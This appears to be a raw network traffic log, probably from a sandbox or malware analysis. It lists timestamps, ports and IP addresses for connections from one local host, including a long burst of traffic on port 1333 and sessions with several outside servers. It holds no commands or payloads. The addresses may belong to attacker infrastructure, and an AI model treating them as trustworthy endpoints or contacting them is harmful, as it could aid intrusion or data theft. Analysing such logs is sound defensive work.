Sep 28, 2023 06:01:56.957007885 CEST	49804	80	192.168.2.3	157.90.36.211
Sep 28, 2023 06:01:57.266654968 CEST	49802	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.267079115 CEST	49807	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.456969023 CEST	80	49802	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:57.457072020 CEST	49802	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.459440947 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.459475040 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:57.459544897 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.463841915 CEST	80	49807	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:57.463901043 CEST	49807	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.464129925 CEST	49807	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.471978903 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.471993923 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:57.590070009 CEST	80	49805	178.237.33.50	192.168.2.3
Sep 28, 2023 06:01:57.590399027 CEST	49805	80	192.168.2.3	178.237.33.50
Sep 28, 2023 06:01:57.660970926 CEST	80	49807	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:57.664596081 CEST	80	49807	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:57.664787054 CEST	49807	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.781465054 CEST	49807	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.782483101 CEST	49809	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.833466053 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:57.833574057 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.920850039 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.920877934 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:57.921891928 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:57.921962976 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.923145056 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:57.970442057 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:57.978976965 CEST	80	49807	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:57.979156017 CEST	49807	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.987231970 CEST	80	49809	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:57.987437963 CEST	49809	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:57.987574100 CEST	49809	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.167455912 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:58.167489052 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:58.167526007 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:58.167599916 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:58.167833090 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:58.167833090 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:58.171837091 CEST	49808	443	192.168.2.3	149.154.167.99
Sep 28, 2023 06:01:58.171852112 CEST	443	49808	149.154.167.99	192.168.2.3
Sep 28, 2023 06:01:58.175024033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.192780972 CEST	80	49809	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.198405981 CEST	80	49809	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.198473930 CEST	49809	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.309740067 CEST	49809	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.310184956 CEST	49811	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.356507063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.356803894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.357151031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.495143890 CEST	80	49811	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.495445013 CEST	49811	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.495568037 CEST	49811	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.515324116 CEST	80	49809	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.515535116 CEST	49809	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.538057089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.680485010 CEST	80	49811	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.685648918 CEST	80	49811	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.686171055 CEST	49811	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.794260025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.794347048 CEST	49811	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.794619083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.794660091 CEST	49813	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:58.795661926 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.976636887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976748943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976772070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976794004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976833105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976869106 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976903915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.976999998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.977036953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.977065086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.977065086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.977066040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.977138996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.977139950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.977154970 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.977194071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:58.977217913 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.977248907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:58.979307890 CEST	80	49811	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:58.979439974 CEST	49811	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.000153065 CEST	80	49813	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.000315905 CEST	49813	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.000638962 CEST	49813	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.158085108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158153057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158191919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158230066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158227921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158229113 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158272028 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158293009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158293009 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158308983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158332109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158346891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158374071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158385038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158399105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158423901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158443928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158493996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158504963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158530951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158545971 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158567905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158586025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158605099 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158622980 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158647060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158648968 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158688068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158704042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158725977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158739090 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158763885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158785105 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158801079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158814907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158838034 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158853054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158875942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.158895016 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.158927917 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.205393076 CEST	80	49813	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.209933043 CEST	80	49813	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.210005999 CEST	49813	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.326056004 CEST	49813	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.326514006 CEST	49814	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.339570999 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339618921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339657068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339694023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339731932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339744091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339744091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339744091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339744091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339768887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339780092 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339822054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339844942 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339895964 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.339946032 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.339996099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.341263056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341325998 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341335058 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.341377020 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.341754913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341806889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341809988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.341844082 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341856003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.341898918 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.341922045 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341959953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.341974974 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342046022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342062950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342099905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342116117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342152119 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342170000 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342206955 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342220068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342258930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342282057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342335939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342354059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342392921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342408895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342447996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342489958 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342528105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342544079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342582941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342602968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342642069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342655897 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342680931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342691898 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342719078 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342726946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342755079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342768908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342803955 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342917919 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.342968941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.342989922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343028069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343035936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343065023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343074083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343112946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343133926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343170881 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343185902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343220949 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343241930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343296051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343312979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343353033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343367100 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343406916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343491077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343527079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.343544960 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.343580961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520457983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520571947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520612955 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520627022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520649910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520687103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520728111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520765066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520801067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520838022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520853996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520853996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520853996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520853996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520853996 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520854950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520874977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.520900965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520900965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.520925045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521001101 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521042109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521049023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521086931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521115065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521152020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521161079 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521199942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521226883 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521271944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521296978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521337032 CEST	80	49814	95.141.41.12	192.168.2.3
Sep 28, 2023 06:01:59.521343946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521399975 CEST	49814	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.521678925 CEST	49814	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:01:59.521864891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521903038 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.521919966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.521946907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522005081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522079945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522093058 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522150993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522164106 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522203922 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522216082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522250891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522273064 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522320032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522344112 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522393942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522476912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522515059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522531033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522553921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522561073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522594929 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522602081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522631884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522639990 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522667885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522675037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522702932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522716045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522741079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522748947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522790909 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522814035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522859097 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522913933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522952080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522959948 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.522989035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.522996902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523034096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523088932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523133993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523159981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523205042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523228884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523274899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523298979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523336887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523348093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523380995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523437977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523475885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523482084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523511887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523519993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523547888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523555994 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523590088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523648977 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523694992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523777962 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523830891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523878098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523915052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.523930073 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.523960114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524014950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524065018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524087906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524133921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524188042 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524225950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524239063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524269104 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524296045 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524341106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524363995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524410963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:01:59.524436951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:01:59.524483919 CEST	49810	1333	192.168.2.3	116.202.2.169
